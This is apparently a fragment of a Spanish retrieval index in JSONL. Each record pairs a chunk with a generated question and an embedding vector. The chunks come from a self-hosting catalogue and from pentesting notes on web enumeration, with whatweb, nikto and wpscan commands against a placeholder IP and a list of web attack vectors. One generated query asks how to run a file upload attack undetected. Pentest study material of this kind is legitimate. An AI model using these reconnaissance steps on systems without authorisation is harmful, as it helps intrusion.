0.02363, 0.09744, 0.01605, 0.01231, 0.01373, -0.05516, 0.09511, -0.02323, 0.08299, -0.07965, 0.00919, -0.13786, -0.12544, -0.05687, 0.0783, 0.00011, -0.03359, -0.05946, 0.00068, -0.08186, 0.01411, -0.01934, -0.02116, 0.09359, 0.04635, 0.03824, 0.03199, 0.00733, -0.00737, 0.03417, -0.09713, -0.07906, -0.00427, 0.0358, -0.03511, 0.10265, 0.03428, -0.07878, -0.07351, -0.1236, -0.00832, -0.03565, -0.04881, -0.01788, -0.07626, 0.09044, -0.09398, -0.03018, -0.01003, -0.0845, -0.07006, -0.06466, 0.07713, 0.14168, 0.04135, 0.02126, 0.14009, -0.0874, 0.22035, 0.10222, -0.01359, -0.00421, 0.06863, -0.08554, -0.09486, 0.12749, -0.0047, 0.11351, 0.05608, 0.0165, -0.00113, -0.0162, -0.07326, 0.16697, -0.07923, -0.05958, -0.07134, 0.00256, 0.00398, -0.11529, 0.06846, 0.00154, -0.00418, 0.02053, -0.04259, -0.09841, -0.00087, -0.03451, -0.01925, 0.0232, -0.03373, 0.0966, -0.02456, -0.06481, -0.01449, 0.01178, 0.03193, 0.02695, -0.02416, -0.04634, -0.04511, -0.0438, 0.01912, 0.0272, 0.04104, -0.1002, 0.08763, 0.00652, -0.06583, 0.0038, -0.09714, 0.10886, -0.02668, 0.10592, -0.09039, -0.00166, -0.02585, 0.06814, 0.01003, -0.12948, -0.03689, 0.0142, 0.00053, -0.00845, 0.01079, -0.09317, 0.04186, 0.0259, -0.02931, 0.01068, 0.00916, 0.01088, -0.00547, 0.00538, 0.02939, -0.02786, -0.05098, -0.04849, -0.00221, -0.08738, 0.02196, -0.10111, -0.10547, 0.08857, 0.02708, 0.04484, 0.07698, 0.06539, 0.04381, 0.06772, 0.00929, -0.01995, 0.00696, -0.02687, -0.0376, 0.0453, -0.04052, -0.0797, -0.07356, -0.02931, 0.03821, 0.03065, -0.0685, -0.0297, -0.01081, -0.01636, 0.06518, 0.03575, -0.05675, -0.01496, 0.04169, -0.03321, -0.02289, 0.01933, 0.00321, -0.04217, -0.04456, 0.01835, 0.05491, 0.08481, -0.02453, 0.03319, 0.08389, 0.02098, -0.01885, 0.00894, -0.01354, -0.01246, -0.00485, 0.02527, 0.00756, -0.07095, -0.06033, 0.00038, -0.08879, -0.04671, 0.04297, -0.0083, -0.03025, -0.03861, 0.00778, -0.08606, -0.03587, 0.04303, -0.03961, -0.0208, -0.04375, -0.0266, -0.03297, 0.08347, 0.07071, -0.09638, -0.00114, 0.036, 0.00676, -0.00685, 0.03625, -0.01229]} -{"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Zoneminder β€” Closed-circuit television (CCTV) software application which supports IP, USB and Analog cameras [GPL-2.0, PHP/deb].", "indexar": "con quΓ© puedo montar un sistema de videovigilancia barato y propio?", "v": [-0.16669, 0.04144, -0.10149, -0.04923, -0.02298, 0.0151, 0.04286, -0.07644, -0.10622, -0.25905, -0.0002, -0.14312, 0.04524, 0.07752, 0.00902, 0.16984, -0.02606, -0.117, 0.0135, 0.01867, 0.03113, -0.15524, 0.07662, -0.11872, 0.01428, 0.09211, 0.07006, 0.01459, -0.1857, 0.06006, 0.02528, 0.07185, 0.01382, -0.06338, -0.09641, -0.06257, 0.03192, 0.0491, -0.01106, 0.01664, -0.01734, -0.04822, -0.00579, -0.047, 0.05572, -0.0885, -0.01467, -0.03663, -0.0454, 0.00432, -0.0426, -0.01938, -0.03151, 0.02572, 0.05279, -0.05346, 0.09461, -0.07247, 0.14477, -0.05298, -0.03036, 0.06286, 0.06948, 0.0419, -0.01271, 0.03301, -0.03813, 0.01857, -0.08929, -0.03289, -0.07878, -0.11197, 0.00981, 0.05288, -0.02873, 0.09167, -0.03982, -0.00913, 0.07263, 0.01551, -0.02596, -0.04445, -0.01774, 0.07317, -0.0073, 0.0255, -0.00802, -0.04222, 0.00599, -0.06458, 0.08254, 0.07234, 0.07831, -0.03192, 0.0429, -0.01655, 0.04304, 0.11876, 0.00619, -0.04708, -0.02399, -0.06946, -0.07372, 0.18824, 0.05407, -0.003, 0.06224, -0.03595, -0.009, -0.12135, -0.00433, -0.01982, -0.09761, -0.01396, -0.1166, -0.05043, -0.06501, 0.03483, 0.02776, 0.00685, -0.02354, 0.02459, 0.01166, -0.07775, 0.06972, 0.0228, -0.03685, 0.12099, 0.00508, 0.07639, 0.0708, 0.00283, -0.09798, -0.07724, 0.06491, -0.02816, -0.01197, 0.03916, -0.0685, -0.01621, 0.0233, 0.05212, 0.02716, -0.09264, 0.09309, 0.01919, 0.05661, -0.08625, -0.00726, 0.01605, 0.012, 0.1235, -0.02608, -0.02878, -0.00611, 0.00829, 0.02849, -0.07726, -0.0104, 0.03737, 0.02373, 0.0724, 0.00514, -0.04006, -0.0327, 0.01772, -0.08181, -0.04889, 0.03746, 0.03908, -0.00434, 0.03321, 0.03095, -0.05807, 0.03791, -0.06546, -0.03211, -0.08316, 0.03104, -0.03188, -0.05604, 0.05037, -0.02808, 0.05413, -0.0309, -0.00601, 0.00296, 0.05333, 0.06908, 0.04262, 0.07693, 0.00781, -0.03817, 0.01833, -0.02496, -0.06767, -0.11575, -0.10733, -0.01546, 0.06866, -0.03099, -0.00081, 0.05105, -0.06506, -0.02182, -0.009, 0.02973, 0.06887, 0.05322, 0.06888, 0.04435, 0.03659, 0.02371, -0.05648, -0.01057, 0.05118, 0.06851, -0.00508, -0.06411, 0.02298, 0.09954, 0.05674, 0.04278, 0.00318, -0.02049, 0.01481, 0.02035, 0.11462, -0.00344, 0.02857, -0.06864, -0.04399, -0.06845, -0.07745, 0.053, 0.00767, 0.03163, 0.02065, -0.06075, -0.02759, 0.0788, 0.10036, -0.00868, -0.05796, -0.04912, -0.08572, -0.07617, 0.02702, 0.07744, -0.1164, 0.00884, 0.01952, -0.0166, -0.05879, -0.02051, -0.05974]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Fuzzing de contenido\nBrute force de rutas/ficheros con gobuster/feroxbuster/ffuf β†’ nota dedicada: Content discovery.\n- Hostnames/vhosts β†’ Vhosts y subdominios.\n- Intercepta y manipula todo con Burp Suite.", "indexar": "cual es una alternativa a gobuster o feroxbuster para encontrar subdominios", "v": [-0.20442, -0.13416, -0.11637, 0.08675, -0.06826, 0.03793, -0.00587, -0.04221, -0.12125, -0.08902, -0.08682, -0.13739, -0.09218, 0.04856, 0.03322, -0.14265, -0.0397, -0.02212, -0.01912, -0.00964, 0.05806, 0.05819, -0.05914, 0.02298, 0.08553, -0.08453, -0.10853, 0.04677, -0.106, -0.00072, 0.07653, -0.12098, 0.05051, -0.0703, -0.12563, -0.04916, 0.11708, -0.03762, -0.0429, 0.09674, 0.03826, 0.02839, 0.00198, 0.05858, -0.11169, -0.04044, -0.09788, -0.02139, -0.04283, 0.02089, -0.01303, -0.02505, 0.04518, -0.04473, 0.02905, -0.05595, -0.03323, -0.14282, 0.09918, 0.04661, -0.02758, -0.04348, -0.05505, -0.08113, 0.08919, 0.03682, -0.08503, 0.07537, -0.03164, -0.05048, 0.00825, -0.05142, -0.005, 0.00361, -0.01645, 0.0824, 0.08185, 0.02781, 0.08668, 0.03533, 0.0261, 0.00848, 0.09801, 0.09687, -0.01227, -0.02139, -0.03412, -0.16695, -0.01457, 0.05412, 0.06072, -0.05242, 0.08709, 0.05758, 0.02937, -0.06325, -0.00146, 0.06104, -0.16619, -0.06922, 0.12069, 0.09015, -0.14168, 0.00273, -0.01064, -0.09023, -0.06387, 0.03561, -0.11993, -0.01858, 0.07424, -0.01878, 0.05694, 0.06872, -0.00154, -0.05477, -0.10207, 0.08023, -0.04628, 0.01106, -0.08655, 0.06137, -0.08333, -0.07649, 0.00544, 0.0218, 0.05476, -0.02093, 0.00526, -0.10801, 0.02202, -0.06252, -0.05434, -0.01406, -0.10577, -0.01418, 0.0233, -0.02817, 0.11332, -0.03295, 0.03726, 0.02886, 0.06292, 0.02289, -0.08826, -0.02569, 0.07781, -0.00384, 0.01113, -0.07365, -0.07346, -0.06759, 0.0269, 0.11327, -0.00144, 0.00354, -0.06193, 0.02909, -0.03027, 0.03904, 0.0428, -0.03828, -0.03058, -0.06299, 0.01218, -0.07038, -0.05275, 0.01342, -0.1281, -0.01556, -0.0095, -0.01939, 0.0855, -0.05091, 0.05598, -0.04776, 0.03557, -0.09929, 0.03895, -0.03513, 0.0699, 0.02887, -0.0471, 0.06876, 0.05048, 0.004, 0.01071, 0.02241, -0.06018, -0.0283, 0.04277, -0.04685, -0.04925, -0.06127, -0.03477, -0.00955, 0.07323, 0.00608, -0.07452, -0.05551, -0.1054, -0.0362, 0.04352, -0.10415, 0.00094, -0.02353, -0.06663, -0.00476, 0.03052, 0.01324, 0.04878, 0.02374, 0.02198, -0.03067, 0.00431, 0.00547, 0.01864, -0.02736, -0.04351, -0.03874, 0.00109, -0.04702, 0.00184, 0.0009, -0.03818, 0.01948, 0.02268, 0.04824, -0.04389, 0.04272, 0.0164, -0.03689, 0.02173, 0.03419, 0.0249, 0.03115, 0.00482, 0.04627, 0.07715, 0.01312, -0.00164, 0.01644, 0.03539, 0.11152, 0.02754, -0.02128, -0.05146, -0.00607, -0.02356, 0.08349, 0.064, 0.06735, -0.05427, 0.0224, 0.07136, 0.0415]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Identificar\n```bash\nwhatweb http://IP\nnikto -h http://IP\n```\nCMS detectado β†’ `wpscan`, `cmsmap`, `searchsploit `.", "indexar": "quΓ© herramienta sirve para detectar quΓ© sistema de gestiΓ³n de contenidos estΓ‘ usando un sitio web?", "v": [-0.12545, 0.10367, -0.15668, -0.23567, 0.09517, -0.15614, -0.13605, -0.10544, -0.03583, -0.08282, -0.15492, -0.05357, -0.10459, -0.08152, 0.11511, 0.03232, 0.12142, -0.18206, 0.03392, -0.08445, -0.03143, -0.06217, -0.02852, -0.05803, -0.11944, -0.04435, 0.08182, -0.13152, -0.13221, 0.04843, 0.00736, -0.02355, 0.06164, 0.03508, -0.15636, -0.01231, -0.01394, 0.04251, -0.02516, 0.04107, 0.00793, -0.00118, -0.06257, 0.03885, 0.04518, 0.00219, 0.00018, -0.093, 0.01003, 0.02223, -0.05151, -0.0989, -0.15879, -0.00863, 0.02576, -0.09217, 0.1137, -0.1158, 0.1419, -0.11873, -0.10908, 0.04786, -0.03016, 0.0004, -0.03929, -0.0435, 0.01691, 0.02944, -0.05174, 0.02889, 0.03695, -0.06266, 0.13895, 0.0016, 0.08249, 0.00424, 0.07337, 0.07847, 0.03439, -0.03085, 0.06894, -0.01178, -0.07721, 0.09061, -0.07712, -0.05771, 0.02765, -0.04862, 0.00985, -0.14958, 0.02597, 0.05018, -0.00135, -0.01965, -0.00808, -0.05372, 0.08735, -0.08764, 0.01043, 0.00648, 0.08817, -0.04666, -0.11558, 0.04555, 0.00762, 0.03933, 0.02053, -0.04589, -0.04448, -0.05032, 0.03033, -0.02825, -0.06198, -0.04641, -0.06911, 0.09638, 0.038, -0.00728, -0.03357, -0.0351, -0.04419, 0.04566, -0.04365, -0.09344, 0.06368, -0.01022, 0.04035, 0.07459, -0.01262, -0.05008, 0.00686, -0.1004, -0.0938, 0.02371, -0.01693, -0.02833, 0.02114, -0.01769, -0.02826, 0.00989, -0.05146, 0.02491, -0.07075, -0.01699, 0.0626, -0.03889, 0.07181, -0.01495, -0.05885, 0.01866, -0.0524, -0.05373, -0.04454, -0.03994, -0.07189, 0.00016, -0.03597, -0.01678, -0.12113, -0.02052, -0.0719, -0.03789, 0.0301, 0.06325, -0.00122, -0.00299, -0.00626, 0.04585, 0.08419, 0.06493, 0.03825, 0.05862, 0.06178, -0.08559, 0.00317, -0.04453, -0.0737, -0.05035, 0.03453, -0.07904, -0.05739, -0.03484, 0.00238, 0.02264, -0.0218, -0.01405, 0.00042, -0.01486, -0.02547, 0.05761, 0.03394, 0.01099, -0.00167, -0.02147, 0.08288, 0.03331, -0.02858, -0.0704, 0.05248, -0.01329, -0.05934, -0.0173, 0.02981, -0.01958, -0.02603, 0.05518, 0.03145, -0.0601, 0.02612, 0.03664, 0.02156, 0.0119, 0.02384, -0.02805, -0.04542, -0.00054, 0.01159, 0.03009, -0.03463, -0.01965, 0.03508, -0.01987, -0.00158, 0.01692, -0.00092, 0.01953, 0.00357, -0.00656, 0.03502, -0.01393, 0.00647, -0.07095, -0.01978, 0.01676, -0.0221, -0.12982, 0.01566, 0.00173, -0.06602, -0.06033, -0.01064, 0.08038, 0.00406, -0.02251, 0.00667, -0.0586, -0.04166, -0.03581, -0.02708, -0.07035, -0.05702, -0.02212, 0.03003, -0.04517, 0.01346, 0.01789]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Identificar\n```bash\nwhatweb http://IP\nnikto -h http://IP\n```\nCMS detectado β†’ `wpscan`, `cmsmap`, `searchsploit `.", "indexar": "con quΓ© puedo identificar automΓ‘ticamente el CMS instalado en una direcciΓ³n IP?", "v": [0.03345, 0.21459, -0.10462, -0.07775, 0.0441, -0.20781, -0.05365, 0.02183, -0.23456, -0.04568, 0.02329, -0.05587, -0.04856, -0.14117, 0.01436, 0.03385, 0.13694, -0.07209, 0.02785, -0.11228, -0.04124, -0.12321, -0.08649, 0.0078, -0.07115, 0.12867, -0.14667, -0.00934, -0.14819, -0.15968, 0.00645, -0.02919, -0.06745, 0.06571, -0.11, -0.12802, -0.05461, 0.09913, -0.01552, 0.08239, 0.04535, 0.0349, 0.01308, 0.08427, 0.08034, -0.04361, 0.10684, -0.15391, 0.07063, -0.13918, -0.11256, -0.06706, -0.10455, -0.0709, -0.06285, 0.02158, 0.10151, -0.01412, -0.00639, 0.01741, -0.09211, 0.10766, -0.10406, 0.06886, -0.01339, -0.03024, -0.05984, -0.00491, -0.0246, -0.01664, 0.05187, -0.07478, -0.04416, 0.03063, 0.05952, 0.06869, -0.03314, 0.03485, 0.14146, -0.01492, 0.04182, -0.04632, -0.04686, 0.01179, -0.03745, -0.04699, 0.01077, -0.1464, -0.03796, -0.08367, 0.0441, 0.05911, 0.00975, 0.06534, 0.01019, -0.026, 0.04158, -0.02189, 0.02972, 0.04421, -0.04659, 0.05533, -0.0313, 0.16941, 0.0849, -0.02691, 0.09135, -0.02367, 0.00145, -0.03582, -0.03021, 0.05352, -0.07352, -0.0679, -0.01736, 8e-05, -0.00038, -0.00056, 0.03074, -0.02132, -0.05596, -0.0445, -0.00561, 0.01991, 0.02298, -0.00341, -0.02511, 0.14969, -0.00375, 0.01089, -0.00321, -0.09098, -0.05842, -0.01695, 0.01219, 0.07686, -0.021, -0.01731, -0.01045, -0.00337, -0.00318, -0.02695, 0.07202, -0.04582, 0.07497, -0.07334, -0.06181, -0.10025, -0.03474, 0.02064, 0.00974, 0.04049, 0.0461, 0.0056, -0.10702, 0.07616, 0.05366, 0.01173, -0.02694, 0.02771, -0.03498, -0.02132, 0.04695, 0.03678, 0.00756, -0.02033, -0.08089, -0.03049, 0.11782, 0.02466, 0.0004, 0.04522, 0.005, -0.07691, -0.02815, -0.04996, -0.00576, -0.06176, 0.06359, 0.00619, -0.05552, 0.00696, 0.01729, -0.02085, -0.01071, -0.05297, 0.03326, 0.00788, 0.00401, -0.00861, 0.05529, 0.00831, -0.02993, -0.01191, 0.02452, -0.0181, -0.01103, -0.07377, -0.02278, -0.0001, -0.05137, 0.04112, -0.00055, -0.03712, 0.05089, 0.01179, 0.0196, 0.08426, -0.0085, 0.0311, 0.01673, -0.01378, 0.07071, -0.0246, -0.05867, 0.03126, -0.0289, -0.0054, 0.00031, 0.01079, -0.00818, 0.00615, 0.07227, -0.02529, 0.00829, 0.00054, 0.00851, 0.02648, 0.03699, 0.0464, -0.05307, 0.04196, -0.02403, -0.04207, 0.11273, -0.02939, 0.0145, -0.04026, -0.03673, -0.00512, 0.01086, 0.03399, 0.0218, -0.03583, -0.02106, -0.05591, -0.08467, 0.03545, -0.02632, -0.05946, -0.02729, -0.00736, 0.02927, -0.01631, -0.01889, 0.00796]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Identificar\n```bash\nwhatweb http://IP\nnikto -h http://IP\n```\nCMS detectado β†’ `wpscan`, `cmsmap`, `searchsploit `.", "indexar": "cuΓ‘l es la forma mΓ‘s rΓ‘pida de saber si un servidor corre WordPress o Joomla sin entrar en Γ©l?", "v": [-0.03842, -0.0094, -0.16806, 0.0174, -0.08756, -0.12094, 0.07249, -0.14893, 0.05233, -0.16456, -0.19544, -0.06293, 0.11524, -0.05524, 0.07048, -0.0291, 0.18928, -0.02126, -0.03856, 0.02904, -0.12102, -0.06888, -0.00199, -0.11715, -0.1091, -0.00812, -0.04373, 0.03726, -0.10724, -0.02489, 0.02877, -0.10936, 0.05002, 0.04325, 0.03242, 0.0763, 0.03341, 0.12426, -0.09339, 0.05966, 0.00059, 0.01877, 0.00978, 0.11674, -0.16505, 0.07054, 0.03221, -0.10829, 0.09172, -0.0626, -0.03998, 0.04888, -0.12281, 0.04062, 0.00512, -0.03587, 0.14296, -0.16816, 0.01392, 0.01262, -0.09394, 0.0754, -0.1403, -0.00744, -0.04818, -0.05842, -0.01674, -0.02903, 0.02129, -0.04355, 0.0161, -0.08507, -0.07124, -0.08781, 0.01965, 0.05265, -0.03517, 0.07029, 0.08581, -0.08343, 0.10087, -0.07022, -0.0016, 0.07556, -0.12659, -0.06247, -0.01206, -0.07836, -0.0243, 0.14097, 0.1305, 0.09524, 0.00059, 0.0804, -0.06225, -0.07132, 0.03606, -0.07829, -0.00119, 0.01386, -0.04562, 0.03457, -0.0819, 0.01138, 0.06681, 0.09376, 0.11607, -0.08682, -0.05113, -0.09294, 0.04218, 0.06236, -0.01095, -0.0369, -0.02202, -0.05011, 0.00126, 0.0166, -0.00945, -0.00016, 0.00314, -0.05547, -0.00587, 0.00557, 0.08, 0.0652, 0.02735, 0.04039, 0.0511, -0.06589, 0.00547, -0.02254, -0.09551, 0.04609, -0.0313, 0.08575, 0.03998, 0.03737, -0.04946, -0.06261, -0.00314, -0.11401, 0.03075, -0.01505, 0.05708, 0.0409, 0.02918, -0.04556, -0.06688, 0.01552, -0.06542, -0.01743, 0.00576, -0.00238, -0.08567, -0.07144, 0.00192, -0.08052, -0.0371, 0.07878, -0.02778, 0.03392, 0.05148, 0.06726, -0.03059, -0.04557, -0.04151, 0.04104, 0.09578, -0.03146, 0.01081, 0.04933, -0.05185, -0.0228, 0.01975, 0.02462, -0.07673, -0.04156, 0.04358, 0.01606, -0.02039, 0.00583, -0.03966, 0.01631, -0.08095, -0.0741, -0.0009, 0.04082, -0.06394, 0.06477, 0.02162, 0.00704, 0.01189, -0.02671, -0.00354, -0.03073, -0.02658, -0.028, 0.03415, -0.01834, -0.07574, -0.06241, -0.02815, -0.02408, 0.03617, -0.00587, -0.00247, 0.02464, 0.05003, 0.03275, -0.0058, -0.01467, 0.01377, -0.01217, 0.01257, -0.03519, 0.00562, -0.04975, 0.03271, -0.04411, 0.03399, 0.04537, 0.01604, -0.026, 0.02663, 0.01122, 0.01433, 0.03368, 0.06227, 0.0309, -0.07213, -0.01211, -0.018, -0.00783, 0.05914, -0.06386, 0.0163, -0.04615, -0.01836, -0.06146, 0.05874, 0.06469, 0.00934, -0.0253, -0.01344, -0.0534, -0.0704, 0.01668, -0.03617, -0.03449, -0.01474, 0.00715, 0.03087, -0.0531, 0.00193, -0.0297]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Vectores tΓ­picos\nTodos en Hacking web: SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE Β· File upload bypass Β· XSS Β· SSTI Β· Authentication attacks.\n\nRelacionado: Content discovery Β· Trampas de enumeraciΓ³n Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "que tecnica sirve para inyectar SQL en un sitio web?", "v": [-0.08173, -0.08979, -0.19694, -0.07204, 0.05596, -0.35842, -0.07808, -0.20026, 0.13827, 0.10151, -0.12421, -0.08224, 0.08076, -0.08285, -0.01064, 0.03727, 0.05723, -0.21668, 0.09785, -0.02347, 0.05901, -0.03182, 0.01179, -0.03611, -0.07514, -0.05959, 0.06069, -0.01863, -0.10378, -0.04789, -0.0303, 0.01383, 0.00411, 0.06529, 0.04525, -0.00783, 0.07232, 0.00581, -0.06283, -0.09758, -0.12389, -0.11503, -0.17057, 0.00677, 0.03574, 0.03514, 0.11154, -0.04361, 0.02408, -0.01148, -0.03352, -0.03441, -0.11463, -0.05473, -0.07044, 0.01966, 0.09641, -0.02928, 0.05491, 0.02647, -0.11015, -0.03146, 0.03238, -0.00113, -0.03173, 0.0006, 0.03363, -0.00083, 0.03101, -0.05988, -0.06146, 0.00575, 0.04041, -0.11725, 0.03872, -0.04435, 0.03291, 0.07907, 0.03144, -0.0969, -0.07574, 0.01591, -0.12305, 0.0596, -0.00777, -0.00486, 0.14045, -0.01582, 0.06649, -0.10253, 0.09995, 0.03855, 0.00905, -0.01962, -0.03048, -0.1032, 0.07025, -0.05436, 0.03942, -0.02372, 0.0285, -0.04935, -0.04911, 0.0637, 0.07805, 0.14187, 0.11027, -0.08016, -0.0219, -0.07821, 0.07181, 0.02688, -0.13778, -0.01224, -0.01229, 0.0355, -0.00181, 0.02255, -0.07552, 0.02443, -0.02853, -0.00551, 0.00063, -0.00609, -0.0694, -0.00711, 0.00846, -0.00093, -0.03747, -0.03968, 0.00206, -0.06249, -0.07113, 0.00668, -0.00938, 0.06391, 0.05964, -0.05576, -0.04848, 0.02473, -0.02885, 0.01767, -0.07339, -0.00291, 0.00606, -0.04624, 0.07994, -0.00952, -0.10475, -0.0396, 0.02302, 0.01923, 0.01887, 0.05724, -0.06338, -0.03617, 0.01331, -0.0305, -0.0404, 0.03305, 0.01323, 0.07472, 0.04152, 0.00343, -0.03912, 0.0431, -0.07712, -0.03669, 0.05666, 0.04856, 0.04412, 0.03517, 0.02089, -0.09227, -0.00572, 0.04101, -0.05473, -0.01187, 0.06088, -0.07653, -0.00562, -0.04857, 0.00422, 0.02816, -0.00375, -0.0071, 0.02756, -0.00835, -0.01431, -0.00965, 0.00211, -0.01158, -0.05868, -0.03037, 0.0437, -0.01077, -0.04969, -0.02226, 0.05527, -0.06095, -0.02821, -0.04991, -0.03675, -0.0272, -0.0217, 0.03392, 0.01434, -0.00879, -0.03238, -0.0299, -0.02743, -0.03664, 0.03102, -0.06064, -0.02078, -0.06301, 0.08799, -0.0299, -0.01009, 0.01215, 0.01769, 0.01168, 0.00388, -0.02764, 0.02006, -0.00038, 0.01789, -0.03884, 0.03126, 0.05678, -0.00413, 0.00061, -0.01529, 0.00031, 0.05441, -0.00327, 0.01536, -0.01694, -0.05866, -0.04208, 0.04088, 0.01611, -0.036, 0.02595, 0.01682, -0.06101, -0.10535, 0.00682, -0.00792, -0.0304, -0.03551, -0.06883, 0.00732, 0.01505, 0.01579, -0.00529]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Vectores tΓ­picos\nTodos en Hacking web: SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE Β· File upload bypass Β· XSS Β· SSTI Β· Authentication attacks.\n\nRelacionado: Content discovery Β· Trampas de enumeraciΓ³n Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "cual es una alternativa libre a los vectores tΓ­picos de hacking web?", "v": [0.19259, 0.03321, -0.07104, 0.00551, -0.03663, 0.0026, 0.04116, -0.06194, 0.08397, -0.03813, 0.0267, -0.14343, -0.07073, 0.03481, 0.17896, 0.03539, 0.13924, -0.2076, 0.1642, 0.00572, -0.03302, 0.00782, -0.07456, -0.00891, -0.02949, -0.10409, -0.02057, 0.11538, -0.13305, 0.01181, 0.04666, -0.03817, -0.00753, 0.03805, -0.14302, 0.05812, 0.0441, 0.04948, 0.07804, 0.02469, 0.06225, -0.00657, -0.1373, -0.04065, -0.02021, -0.01854, -0.09319, -0.06531, -0.01892, -0.01617, -0.02586, -0.01649, -0.17268, 0.05344, 0.03255, -0.0456, 0.12417, 0.01314, -0.00187, -0.06219, -0.05542, 0.10738, 0.08637, -0.08743, 0.00895, -0.05508, -0.07832, 0.00114, -0.10491, 0.05137, 0.07519, 0.03945, 0.03824, -0.02949, 0.04236, 0.09459, 0.00867, 0.06412, 0.03185, 0.04642, -0.02074, -0.13122, 0.0378, 0.00813, -0.09098, -0.06581, 0.07144, -0.12397, 0.03697, -0.02167, 0.10892, 0.10997, 0.01177, 0.00982, -0.05225, -0.10609, 0.09609, 0.01605, 0.07646, 0.04508, -0.01283, 0.00137, -0.14455, 0.05773, 0.05606, -0.00025, -0.00406, -0.01013, -0.0375, -0.05481, 0.01248, 0.01653, -0.05668, -0.01804, -0.04191, -0.08552, 0.01834, 0.03278, 0.01025, -0.04972, -0.08801, -0.0146, -0.0182, 0.02804, 0.03502, 0.02041, -0.03452, 0.05978, -0.05867, 0.01139, 0.04913, -0.03802, -0.08041, -1e-05, -0.10167, 0.01996, 0.05029, -0.14467, 0.04192, -0.01922, 0.02064, 0.06208, 0.00642, -0.03937, 0.05847, -0.00968, 0.08729, -0.07758, -0.11139, -0.07294, -0.0604, 0.09526, -0.0005, 0.07795, -0.15687, 0.05671, -0.08456, -0.07644, -0.0149, 0.09517, 0.04851, 0.027, 0.00739, -0.01742, -0.05933, 0.02463, -0.00443, -0.01981, -0.00893, 0.04176, -0.00154, 0.1002, 0.00927, -0.09714, 0.05075, -0.07688, -0.09283, -0.08057, 0.06671, -0.04961, -0.03426, 0.00492, -0.03052, 0.02031, -0.04164, -0.06281, 0.03855, 0.0175, 0.03029, 0.01848, -0.01568, -0.02521, -0.11725, 0.024, -0.00299, 0.00104, -0.04614, -0.01013, 0.0547, -0.03579, -0.04192, -0.021, 0.0239, -0.04714, -0.0248, 0.03834, -0.05314, -0.06233, -0.03038, 0.08441, 0.05007, -0.04255, 0.05107, 0.00131, -0.01194, -0.00984, 0.0517, -0.01516, -0.04117, -0.01433, 0.06668, 0.04611, 0.01077, 0.03076, -0.01155, 0.02241, 0.04774, 0.0679, -0.02662, 0.02609, -0.01266, 0.01079, -0.01941, -0.04677, 0.01321, 0.0057, -0.01933, -0.02059, -0.07599, -0.00698, 0.02674, 0.03414, -0.04136, -0.07952, -0.05021, -0.06027, -0.10788, -0.01732, -0.03544, -0.0173, -0.03924, 0.0583, 0.05774, -0.02755, -0.01351, -0.00573]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Vectores tΓ­picos\nTodos en Hacking web: SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE Β· File upload bypass Β· XSS Β· SSTI Β· Authentication attacks.\n\nRelacionado: Content discovery Β· Trampas de enumeraciΓ³n Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "con que puedo realizar un ataque de subida de archivos sin ser detectado?", "v": [0.18739, 0.09956, -0.23778, -0.03337, 0.01579, -0.00752, -0.10372, 0.02568, -0.00834, 0.02128, -0.01306, -0.11442, -0.07381, -0.03558, 0.04664, -0.02098, -5e-05, 0.04577, 0.04102, -0.09657, 0.07747, -0.0029, 0.17129, -0.08307, 0.05037, 0.02707, -0.04138, 0.21078, -0.05113, -0.14202, -0.02671, 0.02969, 0.00656, 0.1029, 0.05907, -0.03747, -0.04575, 0.03619, 0.02515, 0.00872, -0.03763, 0.00407, -0.16572, -0.08235, 0.03324, -0.07363, 0.04158, -0.03138, 0.03936, -0.01004, 0.05103, 0.10734, -0.1283, -0.09928, -0.12263, -0.04465, 0.04966, 0.00794, 0.10202, -0.10874, -0.0662, 0.0898, -0.0219, -0.03854, -0.02869, -0.05647, -0.03955, 0.0564, -0.02913, -0.07679, 0.09472, 0.00097, -0.01654, 0.05416, 0.02278, -0.03504, 0.05341, 0.00259, -0.00917, -0.01306, 0.00698, 0.00954, -0.01555, 0.02677, -0.12971, -0.08955, 0.04295, -0.08694, -0.10646, -0.03336, 0.09213, -0.04078, 0.0193, -0.00778, -0.03552, -0.01395, 0.03365, -0.15838, 0.00342, 0.00295, 6e-05, -0.08814, 0.00088, 0.1579, 0.1142, 0.10434, -0.05961, 0.05163, -0.00516, -0.12736, 0.02099, -0.0526, 0.00389, -0.00632, -0.09465, 0.02195, -0.04248, 0.00627, -0.03877, -0.00806, -0.04027, -0.0263, 0.041, 0.01309, -0.05935, -0.08141, -0.03414, 0.03125, -0.04853, 0.03143, -0.01444, 0.08575, 0.0606, -0.03875, -0.09564, 0.0797, 